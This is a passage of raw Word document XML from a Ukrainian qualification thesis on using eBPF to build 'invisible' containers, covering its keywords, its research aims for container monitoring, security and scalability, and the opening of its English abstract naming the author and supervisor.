          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001C7A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">КІБЕРБЕЗПЕКА, ІНСТРУМЕНТ, </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001C7A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>КОНТЕЙНЕР</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, ІЗОЛЯЦІЯ, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">СЕРЕДОВИЩЕ, </w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>МОНІТОРИНГ,</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001C7A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>УПРАВЛІННЯ, ФІЛЬТРАЦІЯ,</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ПРОДУКТИВНІСТЬ,</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001C7A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ПОЛІТИКА </w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001C7A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>БЕЗПЕКИ</w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001C7A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C31695">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ХМАРНЕ СЕРЕДОВИЩЕ,</w:t>
      </w:r>
      <w:r w:rsidR="00C31695" w:rsidRPr="001C7A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ebpf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001C7A87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>DevOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C727FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Мета роботи полягає</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в дослідженні та розробці </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>процесу</w:t>
      </w:r>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> інтеграції технології </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>extended</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Berkeley</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для побудови невидимих контейнерів у сучасних ІТ системах, що дозволить підвищити ефективність, безпеку та масштабованість контейнерних </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>інфраструктур</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Зокрема, метою є розробка інструментів для оптимізації взаємодії контейнерів через застосування </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, а також дослідження потенціалу цієї технології для створення нових підходів до управління та забезпечення конфіденційності в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>багатоконтейнерних</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> середовищах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BF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цілому кваліфікаційна р</w:t>
      </w:r>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">обота спрямована на аналіз потенціалу </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для вирішення завдань моніторингу, оптимізації та забезпечення безпеки в умовах складних та високонавантажених систем. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Дане дослідження спрямоване на </w:t>
      </w:r>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>розробк</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> концептуальних підходів до використання </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для підвищення ефективності та гнучкості роботи ІТ систем, а також вдосконалення управління ресурсами та мережевими взаємодіями в умовах високої масштабованості.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="000F7457" w:rsidRDefault="00A11308" w:rsidP="00C30F54">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="00A11308" w:rsidP="00A11308">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRDefault="00A11308" w:rsidP="00644C3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRPr="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The topic of the qualification work: </w:t>
      </w:r>
      <w:r w:rsidRPr="00913B04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building invisible containers in modern IT systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00913B04">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRPr="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Author of the work: Roman </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Andriyovych</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bakay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721BFD" w:rsidRPr="00721BFD" w:rsidRDefault="00721BFD" w:rsidP="00721BFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Supervisor: Doctor of Technical Sciences, Professor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tetyana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hryhorivna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00721BFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fesenko</w:t>
      </w:r>
